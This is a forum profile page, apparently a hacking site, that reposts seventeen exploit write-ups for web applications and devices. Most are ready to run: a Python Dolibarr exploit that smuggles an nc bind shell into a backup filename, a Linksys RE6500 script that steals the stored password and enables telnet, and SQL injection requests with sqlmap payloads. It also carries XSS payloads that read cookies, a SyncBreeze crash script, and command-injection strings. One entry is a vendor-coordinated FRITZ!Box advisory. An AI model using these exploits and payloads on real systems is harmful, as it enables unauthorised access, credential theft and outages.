Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Raysync 3.3.3.8 - RCE

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Raysync 3.3.3.8 - RCE # Date: 04/10/2020 # Exploit Author: XiaoLong Zhu # Vendor Homepage: www.raysync.io # Version: below 3.3.3.8 # Tested on: Linux step1: run RaysyncServer.sh to build a web application on the local environment, set admin password to 123456 , which will be write to manage.db file. step2: curl "file=@manage.db" http://[raysync ip]/avatar?account=1&UserId=/../../../../config/manager.db to override remote manage.db file in server. step3: login in admin portal with admin/123456. step4: create a normal file with all permissions in scope. step5: modify RaySyncServer.sh ,add arbitrary evil command. step6: trigger rce with clicking "reset" button
  2. HireHackking

    Seotoaster 3.2.0 - Stored XSS on Edit page properties

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Seotoaster 3.2.0 - Stored XSS on Edit page properties # Exploit Author: Hardik Solanki # Vendor Homepage: https://www.seotoaster.com/ # Software Link: https://crm-marketing-automation-platforms.seotoaster.com/ # Version: 3.2.0 # Tested on Windows 10 XSS ATTACK: Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code. The web page or web application becomes a vehicle to deliver the malicious script to the user’s browser. Vulnerable vehicles that are commonly used for Cross-site Scripting attacks are forums, message boards, and web pages that allow comments. XSS IMPACT: 1: Steal the cookie 2: User redirection to a malicious website Vulnerable Parameters: Edit page properties Steps to reproduce: 1: Navigate to "https://localhost/" and log in with valid credentials. 2: Then navigates/click on "Edit page properties". 3: Add the payload "*"><script>alert(document.cookie)</script>*", on "Page header H1 tag" field and click on "Save Page" button. Page Saved succesfully. 4: Hence XSS will get stored and trigger on the main home/main page.
  3. HireHackking

    Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated) # Date: 2020.12.17 # Exploit Author: Yilmaz Degirmenci # Vendor Homepage: https://github.com/Dolibarr/dolibarr # Software Link: https://sourceforge.net/projects/dolibarr/ # Version: 12.0.3 # Tested on: Kali Linux 2020.2 # Vulnerability Description: Open source ERP-CRM Dolibarr 12.0.3 is # vulnerable to authenticated Remote Code Execution Attack. An attacker who # has the access the admin dashboard can manipulate the backup function by # inserting payload into the zipfilename_template parameter at page # /admin/tools/dolibarr_export.php by clicking on the button "Generate # Backup" thus triggering command injection on target system. import requests from bs4 import BeautifulSoup from bs4 import Comment import re import lxml import json import urllib username = input("username: ") password = input("password: ") root_url = input("Root URL: http://192.168.0.15/ --> ") print("Exploit is sent! Check out if the bind shell on port 9999 active!") listener_port = "9999" login_url = root_url + "/index.php?mainmenu=home " vulnerable_url = root_url + "/admin/tools/dolibarr_export.php" upload_url = root_url + "/admin/tools/export_files.php" session = requests.Session() request = session.get(login_url) # Get the token value soup = BeautifulSoup(request.text,"lxml") token = soup.find("input",{'name':'token'})['value'] # Login body = {"token":token, "actionlogin":"login", "loginfunction":"loginfunction", "tz":"-5", "tz_string":"America%2FNew_York", "dst_observed":"1", "dst_first":"2020-03-8T01%3A59%3A00Z", "dst_second": "2020-11-1T01%3A59%3A00Z", "screenwidth":"1668", "screenheight":"664", "dol_hide_topmenu":"", "dol_hide_leftmenu":"", "dol_optimize_smallscreen":"", "dol_no_mouse_hover":"", "dol_use_jmobile":"", "username":username,"password":password} session.post(login_url, data=body, cookies=request.cookies) request = session.get(vulnerable_url) token = soup.find("input",{'name':'token'})['value'] header = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0", "Accept":"*/", "Accept-Encoding": "gzip, deflate", "Origin": root_url, "Referer": root_url+"/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools", "Upgrade-Insecure-Requests": "1" } body = {"token":token, "export_type":"server", "page_y":"1039", "zipfilename_template":"documents_dolibarr_12.0.3_202012160422.tar --use-compress-program='nc -c bash -nlvp 9999' %0a :: ", "compression":"gz"} param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote) session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header)
  4. HireHackking

    Content Management System 1.0 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Content Management System 1.0 - 'id' SQL Injection # Exploit Author: Zhayi (Zeo) # Date: 2020-12-14 # Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: WINDOWS 10 Step 1. Capture the request of the " http://127.0.0.1/ajax.php?action=load_list" page in burpsute Step 2. Save POST the packet Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs " Step 4. This will inject successfully and you will have an information disclosure of all databases contents POST the packet --- POST /ajax.php?action=load_list HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 63 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3 Origin: http://127.0.0.1 Referer: http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3 X-Requested-With: XMLHttpRequest Accept-Encoding: gzip id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0 --- SQLMAP --- Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689 AND 'ZPQO'='ZPQO&start=0 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT 6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0 Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL-- -&start=0 ---
  5. HireHackking

    Content Management System 1.0 - 'email' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Content Management System 1.0 - 'email' SQL Injection # Exploit Author: Zhayi (Zeo) # Date: 2020-12-14 # Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: WINDOWS 10 Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=login" page in burpsute Step 2. Save POST the packet Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs " Step 4. This will inject successfully and you will have an information disclosure of all databases contents POST the packet --- POST /ajax.php?action=login HTTP/1.1 Host: 10.211.55.4 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 61 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3 Origin: http://10.211.55.4 Referer: http://10.211.55.4/login.php X-Requested-With: XMLHttpRequest Accept-Encoding: gzip email=admin%40admin.com%27and%27p%27%3D%27p&password=admin123 --- SQLMAP --- Parameter: email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: email=admin@admin.com'and'p'='p' AND 9108=9108 AND 'WlxU'='WlxU&password=admin123 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=admin@admin.com'and'p'='p' AND (SELECT 3864 FROM (SELECT(SLEEP(5)))pNJR) AND 'hxyZ'='hxyZ&password=admin123 ---
  6. HireHackking

    Content Management System 1.0 - 'First Name' Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title:Content Management System 1.0 - 'First Name' Stored XSS # Exploit Author: Zhayi (Zeo) # Date: 2020-12-14 # Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Tested on: WINDOWS 10 Step 1: Log in to the CMS with any valid user credentials. Step 2: Click on the logged in username on header and select Manage Account. Step 3: Rename the user First Name to "<script>alert(document.domain)</script>". Step 4: Update Profile and this will trigger the XSS. Step 5: Logout and login again and the page will display the domain name.
  7. HireHackking

    Linksys RE6500 1.0.11.001 - Unauthenticated RCE

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE # Date: 31/07/2020 # Exploit Author: RE-Solver # Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4 # Vendor Homepage: www.linksys.com # Version: FW V1.05 up to FW v1.0.11.001 # Tested on: FW V1.05 up to FW v1.0.11.001 # Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE # Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution. # An attacker can access system OS configurations and commands that are not intended for use beyond the web UI. #!/usr/bin/env python from requests import Session import requests import os print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.") print("Tested on FW V1.05 up to FW v1.0.11.001") print("RE-Solver @solver_re") ip="192.168.1.226" command="nvram_get Password >/tmp/lastpwd" #save device password; post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1" url_codeinjection="http://"+ip+"/goform/setSysAdm" s = requests.Session() s.headers.update({'Origin': "http://"+ip}) s.headers.update({'Referer': "http://"+ip+"/login.shtml"}) r= s.post(url_codeinjection, data=post_data) if r.status_code == 200: print("[+] Prev password saved in /tmp/lastpwd") command="busybox telnetd" #start telnetd; post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1" url_codeinjection="http://"+ip+"/goform/setSysAdm" s = requests.Session() s.headers.update({'Origin': "http://"+ip}) s.headers.update({'Referer': "http://"+ip+"/login.shtml"}) r=s.post(url_codeinjection, data=post_data) if r.status_code == 200: print("[+] Telnet Enabled") #set admin password post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1" url_codeinjection="http://"+ip+"/goform/setSysAdm" s = requests.Session() s.headers.update({'Origin': "http://"+ip}) s.headers.update({'Referer': "http://"+ip+"/login.shtml"}) r=s.post(url_codeinjection, data=post_data) if r.status_code == 200: print("[+] Prevent corrupting nvram - set a new password= admin")
  8. HireHackking

    Smart Hospital 3.1 - "Add Patient" Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Smart Hospital 3.1 - "Add Patient" Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-18 # Vendor Homepage: https://smart-hospital.in/index.html # Software Link: https://codecanyon.net/item/smart-hospital-hospital-management-system/23205038 # Affected Version: Version 3.1 # Tested on: Kali Linux Step 1. Login to the application with Super Admin credentials Step 2. Click on "OPD-Out Patient" and then click on "Add Patient" then select "Add Patient" Again. Step 3. Insert payload - "><svg/onmouseover=alert(1)> , in Name , Guardian Name , Email , Address , Remarks and Any Known Allergies and Save it. Step 4. Now the patient profile will open , when your course will move around profile details they will show an alert box.
  9. HireHackking

    Queue Management System 4.0.0 - "Add User" Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Queue Management System 4.0.0 - "Add User" Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-21 # Google Dork: N/A # Vendor Homepage: http://codekernel.net/ # Software Link: https://codecanyon.net/item/queue-management-system/22029961 # Affected Version: Version 4.0.0 # Patched Version: Unpatched # Category: Web Application # Tested on: Kali Linux Step 1. Login as admin. Step 2. Select "Users" from menu and click on "Add User . Step 3. Insert payload - "><svg/onload=alert(1)> in "Firtst Name" , " Last Name "and " Email ". Step 4. Now open "User List " from menu and you will get alert box.
  10. HireHackking

    FRITZ!Box 7.20 - DNS Rebinding Protection Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FRITZ!Box 7.20 - DNS Rebinding Protection Bypass # Date: 2020-06-23 # Exploit Author: RedTeam Pentesting GmbH # Vendor Homepage: https://en.avm.de/ # Version: 7.20 # CVE: 2020-26887 Advisory: FRITZ!Box DNS Rebinding Protection Bypass RedTeam Pentesting discovered a vulnerability in FRITZ!Box router devices which allows to resolve DNS answers that point to IP addresses in the private local network, despite the DNS rebinding protection mechanism. Details ======= Product: FRITZ!Box 7490 and potentially others Affected Versions: 7.20 and below Fixed Versions: >= 7.21 Vulnerability Type: Bypass Security Risk: low Vendor URL: https://en.avm.de/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-003 Advisory Status: published CVE: 2020-26887 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-26887 Introduction ============ "For security reasons, the FRITZ!Box suppresses DNS responses that refer to IP addresses in its own home network. This is a security function of the FRITZ!Box to protect against what are known as DNS rebinding attacks." (from the vendor's homepage) More Details ============ FRITZ!Box router devices employ a protection mechanism against DNS rebinding attacks. If a DNS answer points to an IP address in the private network range of the router, the answer is suppressed. Suppose the FRITZ!Box routers DHCP server is in its default configuration and serves the private IP range of 192.168.178.1/24. If a DNS request is made by a connected device, which resolves to an IPv4 address in the configured private IP range (for example 192.168.178.20) an empty answer is returned. However, if instead the DNS answer contains an AAAA-record with the same private IP address in its IPv6 representation (::ffff:192.168.178.20) it is returned successfully. Furthermore, DNS requests which resolve to the loopback address 127.0.0.1 or the special address 0.0.0.0 can be retrieved, too. Proof of Concept ================ Supposing the following resource records (RR) are configured for different subdomains of example.com: ------------------------------------------------------------------------ private.example.com 1 IN A 192.168.178.20 local.example.com 1 IN A 127.0.0.1 privateipv6.example.com. 1 IN AAAA ::ffff:192.168.178.20 ------------------------------------------------------------------------ A DNS request to the FRITZ!Box router for the subdomain private.example.com returns an empty answer, as expected: ------------------------------------------------------------------------ $ dig private.example.com @192.168.178.1 ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;private.example.com. IN A ------------------------------------------------------------------------ DNS requests for the subdomains privateipv6.example.com and local.example.com return the configured resource records successfully, effectively bypassing the DNS rebinding protection: ------------------------------------------------------------------------ $ dig privateipv6.example.com @192.168.178.1 AAAA ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA ; (1 server found) ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;privateipv6.example.com. IN AAAA ;; ANSWER SECTION: privateipv6.example.com. 1 IN AAAA ::ffff:192.168.178.20 $ dig local.example.com @192.168.178.1 ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;local.example.com. IN A ;; ANSWER SECTION: local.example.com. 1 IN A 127.0.0.1 ------------------------------------------------------------------------ Workaround ========== None. Fix === The problem is corrected in FRITZ!OS 7.21. Security Risk ============= As shown, the DNS rebinding protection of FRITZ!Box routers can be bypassed allowing for DNS rebinding attacks against connected devices. This type of attack however is only possible if vulnerable services are present in the local network, which are reachable over HTTP without authentication. The web interface of FRITZ!Box routers for example is not vulnerable to this type of attack, since the HTTP Host header is checked for known domains. For this reason the risk is estimated to be low. Timeline ======== 2020-06-23 Vulnerability identified 2020-07-08 Vendor notified 2020-07-20 Vendor provided fixed version to RedTeam Pentesting 2020-07-23 Vendor notified of another problematic IP 2020-08-06 Vendor provided fixed version to RedTeam Pentesting 2020-10-06 Vendor starts distribution of fixed version for selected devices 2020-10-19 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
  11. HireHackking

    Xeroneit Library Management System 3.1 - "Add Book Category " Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Xeroneit Library Management System 3.1 - "Add Book Category " Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-18 # Vendor Homepage: https://xeroneit.net/ # Software Link: https://xeroneit.net/portfolio/library-management-system-lms # Affected Version: Version 3.1 # Tested on: Kali Linux Step 1. Login to the application as Admin. Step 2. Select "Book" from menu and click on "Book Category" . Now , click on "Add" Button. Step 3. Insert payload - "><img src onerror=alert(1)> , in "Category Name" and Save it. Step 4. Now you will see an alert box .
  12. HireHackking

    SyncBreeze 10.0.28 - 'login' Denial of Service (Poc)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SyncBreeze 10.0.28 - 'login' Denial of Service (Poc) # Data: 18-Dec-2020 # Exploit Author: Ahmed Elkhressy # Vendor Homepage: http://www.syncbreeze.com # Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe # Version: 10.0.28 # Tested on: Windows 7, Windows 10 #!/usr/bin/python import socket host="192.168.1.9" payload = 'A' *1000 request = "" request += "POST /login HTTP/1.1\r\n" request += "Host: "+host+"\r\n" request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n" request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" request += "Accept-Language: en-US,en;q=0.5\r\n" request += "Accept-Encoding: gzip, deflate\r\n" request += "Content-Type: application/x-www-form-urlencoded\r\n" request += "Content-Length: 27\r\n" request += "Origin: http://"+host+"\r\n" request += "Connection: keep-alive\r\n" request += "Referer: http://"+host+"/login"+payload+"\r\n" request += "Upgrade-Insecure-Requests: 1\r\n" request += "\r\n" request += "username=test&password=test" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 80)) s.send(request) print s.recv(1024) s.close
  13. HireHackking

    Academy-LMS 4.3 - Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Academy-LMS 4.3 - Stored XSS # Date: 19/12/2020 # Vendor page: https://academy-lms.com/ # Version: 4.3 # Tested on Win10 and Google Chrome # Exploit Author: Vinicius Alves # XSS Payload: </script><svg onload=alert();> 1) Access LMS and log in to admin panel 2) Access courses page 3) Open course manager and SEO menu 4) Paste the XSS Payload tag and Submit 5) Access the course page on frontend 6) Trigged!
  14. HireHackking

    Spotweb 1.4.9 - 'search' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Spotweb 1.4.9 - 'search' SQL Injection # Google Dork: N/A # Date: 20 December 2020 # Exploit Author: BouSalman # Vendor Homepage: https://github.com/spotweb/spotweb # Software Link: N/A # Version: 1.4.9 # Tested on: Ubuntu 18.04 # CVE: CVE-2020-35545 GET /?page=index&search[tree]=cat0_z0_c')+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))c)+AND+(' HTTP/1.1 Host: 192.168.99.151 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close
  15. HireHackking

    SCO Openserver 5.0.7 - 'outputform' Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SCO Openserver 5.0.7 - 'outputform' Command Injection # Google Dork: inurl:/cgi-bin/manlist?section # Discovered Date: 04/09/2020 # Author: Ramikan # Vendor Homepage: https://www.xinuos.com/products/ # Software Link: https://www.sco.com/products/openserver507/-overview # Affected Version: Tested on 5.0.7, 6 can be affected on other versions. # Tested on: SCO Openserver 5.0.7 & version 6 # CVE : CVE-2020-25494 ************************************************************************************************************************************* Vulnerability :OS Command Injection ************************************************************************************************************************************* The outputform, toclevels parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability. It is also possible to cause the application to interact with an external domain, to verify that a command was executed. The payload |nslookup -q=cname mytest.com.& was submitted in the parameters. The application performed a DNS lookup for the specified domain name. Additionally, the payload |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 was submitted in the parameters. The application took 20960 milliseconds to respond to the request, compared with 1348 milliseconds for the original request. Affected URL:http://host:8457/cgi-bin/printbook Affected Paramenter: outputform, toclevels ************************************************************************************************************************************* POC ************************************************************************************************************************************* Request: ************************************************************************************************************************************* POST /cgi-bin/printbook HTTP/1.1 Host: 10.0.0.45:8457 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.45:8457/en/Navpages/printmap.html Content-Type: application/x-www-form-urlencoded Content-Length: 118 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 outputform=ps%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'%20%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23%5c%22%20%7cping%20-n%2021%20127.0.0.1&booktitle=test&toclevels=3&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html&part=%2Fen%2FUSE_oview%2FCONTENTS. ************************************************************************************************************************************* Response: ************************************************************************************************************************************* HTTP/1.1 200 OK Date: Tue, 04 Sep 2020 11:17:52 GMT Server: Apache/1.3.33 (Unix) mod_perl/1.29 Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 3188
  16. HireHackking

    SCO Openserver 5.0.7 - 'section' Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SCO Openserver 5.0.7 - 'section' Reflected XSS # Google Dork: inurl:/cgi-bin/manlist?section # Discovered Date: 14/06/2020 # Author: Ramikan # Vendor Homepage: https://www.xinuos.com/products # Software Link: https://www.sco.com/products/openserver507/-overview # Affected Version: Tested on 5.0.7, 6 can be affected on other versions. # Tested on: SCO Openserver 5.0.7 & version 6 # CVE : CVE-2020-25495 ************************************************************************************************************************************* Vulnerability :Refelected XSS & HTML Injection ************************************************************************************************************************************* A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'. Affected URL:http://host:8457/cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> Affected Paramenter: section ************************************************************************************************************************************* POC ************************************************************************************************************************************* Request: ************************************************************************************************************************************* GET /cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> HTTP/1.1 Host: 192.168.20.48:8457 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ************************************************************************************************************************************* Response: ************************************************************************************************************************************* HTTP/1.1 200 OK Date: Thu, 03 Sep 2020 17:08:51 GMT Server: Apache/1.3.36 (Unix) mod_perl/1.29 Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 2680 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"> <head> <title>Manual section "><h1>hello</h1></P><script>alert(123)</script></title> <META HTTP-EQUIV='Content-Type' CONTENT='text/html;charset=ISO-8859-1'> <link rel="stylesheet" type="text/css" href="/styles/lin_moz.css" /> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> </head> <body bgcolor="#FFFFFF" topmargin="0" marginheight="0"> <!-- Begin DocView navigation toolbar --> <!--htdig_noindex--> <table class=dvtb width="100%" cellpadding=0 cellspacing=0 border=0 style="padding: 0;" > <tr valign=top class=dvtb> <td class=dvdb> <table class=dvtb cellpadding=3 cellspacing=1 border=0 bgcolor=#FFFFFF width=611 > <tr class=dvtb> <td class=dvtb align=center style="background: #2059A6;"> <a href="/en/index.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> DOC HOME </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/en/Navpages/sitemap.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> SITE MAP </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/manform?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> MAN PAGES </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/infocat?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> GNU INFO </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/search?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> SEARCH </a></td> </tr> </table> </td> <td class=dvtb align="left" width=100%> <table class=dvtb cellpadding="3" cellspacing="1" border="0" width="100%" bgcolor="#FFFFFF" > <tr class=dvtb valign="top"> <td class=dvtb style="background: #2059A6;" align=center width=100%> <a name=null class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;" > &nbsp; </a> </td> </tr> </table> </td> </tr> </table> <!--/htdig_noindex--> <!-- End DocView navigation toolbar --> <h1>Manual section<h1>Manual section "><h1>hello</h1></P><script>alert(123)</script></h1><PRE> </PRE> </body></html>
  17. HireHackking

    Spiceworks 7.5 - HTTP Header Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Spiceworks 7.5 - HTTP Header Injection # Google Dork: inurl:/pro_users/login # Discovered Date: 15/09/2020 # Exploit Author: Ramikan # Vendor Homepage: https://www.spiceworks.com # Affected Version: 7.5.7.0 may be others. # Tested On Version: 7.5.7.0 # CVE : CVE-2020-25901 Vulnerability: Host Header Injection Description: Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Spiceworks version 7.5.7.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack. Request: GET / HTTP/1.1 Host: google.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: 